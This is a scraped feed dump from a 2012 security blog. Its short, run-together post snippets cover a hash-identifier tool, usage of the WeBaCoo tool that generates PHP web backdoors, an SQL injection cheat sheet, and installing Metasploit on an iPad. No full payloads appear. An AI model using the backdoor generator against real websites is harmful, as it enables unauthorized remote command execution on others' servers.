href="http://feedads.g.doubleclick.net/~a/F-UeeSxsRsC4_StajZ7uqPBD2Go/0/da"><img src="http://feedads.g.doubleclick.net/~a/F-UeeSxsRsC4_StajZ7uqPBD2Go/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/F-UeeSxsRsC4_StajZ7uqPBD2Go/1/da"><img src="http://feedads.g.doubleclick.net/~a/F-UeeSxsRsC4_StajZ7uqPBD2Go/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/Zo-LkqrWeK0" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/ip-spoofing-attack-tool-list.htmltag:blogger.com,1999:blog-4148307234956956891.post-6701060591614436028Sat, 28 Jan 2012 04:56:00 +00002012-01-28T11:57:14.650+07:00toolsecurity newspasswordhacking toolInformation SecurityarticlesecurityCrackBrute ForceexploitationpentestSourcepacket analysishackingtrickSoftware to identify the different types of hashes used to encrypt data and especially passwords. Encryption formats supported: ADLER-32 CRC-32 CRC-32B CRC-16 CRC-16-CCITT DES(Unix) FCS-16 GHash-32-3 GHash-32-5 GOST R 34.11-94 Haval-160 Haval-192 110080 ,Haval-224 114080 ,Haval-256 Lineage II C4 Domain Cached Credentials XOR-32 MD5(Half) MD5(Middle) MySQL MD5(phpBB3) MD5(http://feedproxy.google.com/~r/r00tsecblog/~3/XyI_64scfAk/hash-identifier-tool.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/HyavOfkwlEjZbrNo5VX7qmey8hs/0/da"><img src="http://feedads.g.doubleclick.net/~a/HyavOfkwlEjZbrNo5VX7qmey8hs/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/HyavOfkwlEjZbrNo5VX7qmey8hs/1/da"><img src="http://feedads.g.doubleclick.net/~a/HyavOfkwlEjZbrNo5VX7qmey8hs/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/XyI_64scfAk" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/hash-identifier-tool.htmltag:blogger.com,1999:blog-4148307234956956891.post-2140800725362862232Thu, 26 Jan 2012 09:47:00 +00002012-01-26T16:47:19.861+07:00toolhowtohacking toolInformation SecurityarticlesecurityWeb Application AttackCrackWebbackdoorexploitationpentestSourceWeb Applicationhackingtrick1. Get the WeBaCoo - git clone https://github.com/anestisb/WeBaCoo webacoo - cd webacoo - ./webacoo.pl -h Usage: webacoo.pl [options]Options:  -g        Generate backdoor code (-o is required)  -f FUNCTION    PHP System function to use    FUNCTION        1: system     (default)        2: shell_exec        3: exec        4: passthru        5: popen  -o OUTPUT    Generated backdoor output filenamehttp://feedproxy.google.com/~r/r00tsecblog/~3/r5u-ZndYdIk/howto-use-webacoo-web-backdoor-cookie.htmlnoreply@blogger.com (Sumate jitpukdebodin)1<p><a href="http://feedads.g.doubleclick.net/~a/3aMID92o_ejWMo4G9KXrGbSwPe8/0/da"><img src="http://feedads.g.doubleclick.net/~a/3aMID92o_ejWMo4G9KXrGbSwPe8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/3aMID92o_ejWMo4G9KXrGbSwPe8/1/da"><img src="http://feedads.g.doubleclick.net/~a/3aMID92o_ejWMo4G9KXrGbSwPe8/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/r5u-ZndYdIk" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/howto-use-webacoo-web-backdoor-cookie.htmltag:blogger.com,1999:blog-4148307234956956891.post-5484405796826231762Thu, 26 Jan 2012 09:33:00 +00002012-01-26T16:33:36.551+07:00 If you like my blog, Please Donate Me One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00 http://feedproxy.google.com/~r/r00tsecblog/~3/G84wZtR4Uac/sql-injection-cheat-sheet-by-nt-object.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/OBnM1gDOzJy7qxczQFmRKzytrH8/0/da"><img src="http://feedads.g.doubleclick.net/~a/OBnM1gDOzJy7qxczQFmRKzytrH8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/OBnM1gDOzJy7qxczQFmRKzytrH8/1/da"><img src="http://feedads.g.doubleclick.net/~a/OBnM1gDOzJy7qxczQFmRKzytrH8/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/G84wZtR4Uac" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/sql-injection-cheat-sheet-by-nt-object.htmltag:blogger.com,1999:blog-4148307234956956891.post-1465761934131961297Thu, 26 Jan 2012 09:03:00 +00002012-01-26T16:03:07.716+07:00toolnmaphowtohacking toolInformation SecurityarticlesecuritymetasploitshellexploitationlinuxpentestSourceiOShackingtrick1. SSH to your ipad for easy typing 2. Install all packet that must use for Metasploit - apt-get install adv-cmds apt basic-cmds bootstrap-cmds bzip2 class-dump coreutils developer-cmds diskdev-cmds file-cmds gawk gdb git gzip iokittools less more nano network-cmds ldid openssh rsync shell-cmds system-cmds com.ericasadun.utilities top uikittools findutils inetutils diffutils lsof subversion vim http://feedproxy.google.com/~r/r00tsecblog/~3/ROBqL9jewmo/howto-install-metasploit-on-your.htmlnoreply@blogger.com (Sumate jitpukdebodin)0<p><a href="http://feedads.g.doubleclick.net/~a/WMEwL1N2Ln9O2EzxmhNGbitgP6U/0/da"><img src="http://feedads.g.doubleclick.net/~a/WMEwL1N2Ln9O2EzxmhNGbitgP6U/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/WMEwL1N2Ln9O2EzxmhNGbitgP6U/1/da"><img src="http://feedads.g.doubleclick.net/~a/WMEwL1N2Ln9O2EzxmhNGbitgP6U/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/r00tsecblog/~4/ROBqL9jewmo" height="1" width="1"/>http://r00tsec.blogspot.com/2012/01/howto-install-metasploit-on-your.html